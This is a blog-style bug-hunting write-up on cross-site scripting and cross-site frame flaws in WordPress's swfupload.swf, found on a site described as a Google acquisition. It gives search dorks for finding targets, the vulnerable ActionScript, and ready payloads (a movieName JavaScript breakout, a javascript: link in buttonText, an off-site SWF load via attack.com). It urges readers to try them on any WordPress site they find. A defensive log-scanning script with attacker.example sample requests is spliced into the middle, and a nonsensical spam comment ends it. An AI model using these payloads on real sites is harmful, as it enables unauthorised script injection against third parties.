swfupload XSF/XSS in one of the Google acquisitions

Hello, fellow readers

I was reading about some XSS and XSF (cross-site frame) vulnerabilities in the popular WordPress SWF file called swfupload.swf.
Then I heard of some Google acquisitions, so I started looking for domains, and I got one which is running on WordPress.

As the vulnerability cannot be fixed, since it is not a part of Google now (not the recent one),
let's call it example.com.

So I used some Google magic (Google dorks) to find SWF files.

#The trick to find files is to use Google dorks.
#It's easier to find them using dorks than brute-forcing for hours.

site:*.site.com ext:<filetype>
    or
site:*.site.*
    or
site:site.com -subdomain

#Above are some dorks I personally use to find files and subdomains easily (time saver, isn't it?)

Now, coming back to the point...!

Before we begin, let's understand the vulnerability and its cause; then we'll move on to the exploitation part.

About:~
XSF occurs when an SWF has permission, or is otherwise able, to load another file from another directory or site. The vulnerable
SWF can be exploited by just making it load an SWF/image/any other file (leading to XSS, etc.).

Vulnerable code:~

// The SWF exposes SetButtonTextStyle to the page's JavaScript via ExternalInterface
ExternalInterface.addCallback("SetButtonTextStyle", this.SetButtonTextStyle);

// ...and, on startup, feeds it the buttonTextStyle FlashVar / query-string
// parameter straight from loaderInfo, with no validation of the value
try
{
   this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
   // only a conversion failure lands here; any string value is accepted above
   this.SetButtonTextStyle("");
}

As you can see, the buttonTextStyle parameter is not validated at all (its value is passed through exactly as given), so SetButtonTextStyle accepts any value
and the vulnerable SWF will load any file:

http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf

2.

// The same pattern for SetButtonText: exposed to JavaScript via ExternalInterface...
ExternalInterface.addCallback("SetButtonText", this.SetButtonText);

// ...and filled from the unvalidated buttonText parameter on startup
try
{
   this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
   this.SetButtonText("");
}

Let's come to the PoC now; time to exploit it.
1. Open http[s]://example.com/wp-includes/js/swfuploads.js
2. Now try these payloads:


*.payload : ?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

*.Payload : ?buttonImageURL=https://s3.amazonaws.com/ceblog/wp-content/uploads/2016/04/22110359/youve-been-hacked.png

*.payload :?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3ECLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)</script>


#Above are the payloads I used as PoC (sorry for video)

As you can see, the above payloads work well; you can use your creativity.
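The two handlers above take buttonTextStyle and buttonText (and the other FlashVars such as movieName and buttonImageURL) straight from the query string, and the PoC payloads show what that allows: off-site URLs, a movieName that breaks out of the generated JavaScript, and HTML markup in buttonText. A defender can apply the allowlist the handlers should have applied, both as input validation and as a check over web-server access logs for requests to swfupload.swf carrying such values. The script below is an added example, not code from this post or from the SWFUpload project; the log lines are constructed, and the file path /wp-includes/js/swfupload/swfupload.swf, the parameter names checked and the allowed-character sets are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameters swfupload.swf reads from FlashVars / the query string (names taken from the post).
URL_PARAMS = {"buttonImageURL"}          # should stay a same-origin path
STYLE_PARAMS = {"buttonTextStyle"}       # should be a bare CSS declaration
TEXT_PARAMS = {"buttonText"}             # should be plain text, never markup
JS_NAME_PARAMS = {"movieName"}           # is spliced into JavaScript, so must be an identifier

# Assumed allowlists: scheme:// or protocol-relative // marks an off-site URL; a CSS
# declaration needs no '/', '(' or quotes (so no url(...) and no path); an identifier is [A-Za-z0-9_].
EXTERNAL_URL_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)
SAFE_NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
SAFE_STYLE_RE = re.compile(r"[A-Za-z0-9 ,#;:{}\-]*")
HTML_RE = re.compile(r"[<>\"']")

# Apache/nginx "combined" access-log prefix: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def check_param(name, value):
    """Return None when the (already URL-decoded) value is acceptable, else a short reason."""
    if name in JS_NAME_PARAMS and not SAFE_NAME_RE.fullmatch(value):
        return "movieName is not a plain JavaScript identifier"
    if name in URL_PARAMS and EXTERNAL_URL_RE.match(value):
        return "buttonImageURL points off-site"
    if name in STYLE_PARAMS and not SAFE_STYLE_RE.fullmatch(value):
        return "buttonTextStyle contains characters outside a CSS declaration"
    if name in TEXT_PARAMS and HTML_RE.search(value):
        return "buttonText contains HTML markup"
    return None


def scan_access_log(lines):
    """Flag requests to swfupload.swf whose query parameters fail check_param."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        client, when, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("swfupload.swf"):
            continue                      # only the vulnerable SWF is of interest
        # Split the query by hand rather than parse_qs so ';' inside a payload is kept intact.
        for pair in filter(None, parts.query.split("&")):
            name, _, raw = pair.partition("=")
            reason = check_param(name, unquote_plus(raw))
            if reason:
                findings.append({"client": client, "time": when, "status": status,
                                 "param": name, "reason": reason})
    return findings


# Constructed sample log lines: one benign request, two abusive ones, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-includes/js/swfupload/swfupload.swf'
    '?movieName=SWFUpload_0&buttonImageURL=/wp-includes/images/upload.png HTTP/1.1" 200 12345',
    '203.0.113.9 - - [10/Oct/2023:13:57:01 +0000] "GET /wp-includes/js/swfupload/swfupload.swf'
    '?buttonImageURL=https://attacker.example/x.png&buttonTextStyle=http://attacker.example/Exploiting.swf HTTP/1.1" 200 12345',
    '203.0.113.9 - - [10/Oct/2023:13:58:11 +0000] "GET /wp-includes/js/swfupload/swfupload.swf'
    '?movieName=%22%5D%29%3B%7Dalert%281%29%3B%2F%2F HTTP/1.1" 200 12345',
    '203.0.113.4 - - [10/Oct/2023:14:00:00 +0000] "GET /index.php?buttonImageURL=https://cdn.example/logo.png HTTP/1.1" 200 999',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['param']}: {f['reason']}")
```

Running it prints three findings: the off-site buttonImageURL, the URL smuggled into buttonTextStyle (rejected because a CSS declaration has no reason to contain '/'), and the movieName value that breaks out of the generated JavaScript. The same check_param allowlist, applied inside the SWF before the value reaches SetButtonTextStyle/SetButtonText, is the mitigation; the log scan is how you find out whether anyone has already been probing the file.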

Let's take a look at the screenshot.
#I have removed the link from the screenshot.
#The popup contains the domain name, like example.com.



So, as usual, it's not a part of Google, so I didn't get anything, but you can try it out: if you see any WordPress site running, try it out, if such an SWF file exists.

#Tip: when you use dorks, try swf first, and try out the dorks above.

Thank you for reading this article,

share it.

and enjoy <3

Comments

  1. While I actually read about quite a few Bing acquisitions, hence getting interested in Redirect HTTP to HTTPS domain names, plus managed to get the one that is definitely going for WordPress.
